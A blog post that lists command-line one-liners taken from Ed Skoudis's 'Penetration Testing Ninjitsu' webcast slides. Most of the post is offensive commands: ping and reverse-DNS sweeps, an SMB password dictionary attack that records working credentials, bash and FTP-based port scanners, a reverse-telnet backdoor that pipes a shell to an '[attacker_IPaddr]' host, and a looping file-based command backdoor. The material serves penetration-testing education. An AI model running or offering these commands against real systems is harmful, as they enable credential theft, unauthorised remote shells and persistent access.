Penetration Testing Ninjitsu

Core Technologies hosted a series of three webcasts called Penetration Testing Ninjitsu by Ed Skoudis (http://www.coresecurity.com/content/webcast-series-with-sans).  I highly recommend listening to these web casts and downloading the slides for your reference.  I’m including the commands extracted from the slides that can be very useful for a penetration test.

NOTE: 12/2018 – Link to the webcast no longer works. The Internet Archive has the slides as a PDF. I’ve downloaded it and host it here as well.

Ninjitsu I

Ping Sweep
C:\> for /L %i in (1,1,255) do @ping –n 1 10.10.10.%i | find “Reply”

Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\10.10.10.10 %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\10.10.10.10 /del)

Ninjitsu II

Linux Command-Line Port Scanner
$ port=1; while [ $port –lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]

Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Ninjitsu III

Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface “wireless network connection” disable & ping –n 3 127.0.0.1 >nul & netsh interface set interface “wireless network connection” enable & ping –n 4 127.0.0.1 >nul & netsh wlan show networks mode=bssid)

Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"

Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"

Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI

List Domain Password Settings
C:\>net accounts /domain

Twitter
Follow by Email
LinkedIn
YouTube
Google+
RSS

One thought to “Penetration Testing Ninjitsu”

Leave a Reply

Your email address will not be published. Required fields are marked *

 

This site uses Akismet to reduce spam. Learn how your comment data is processed.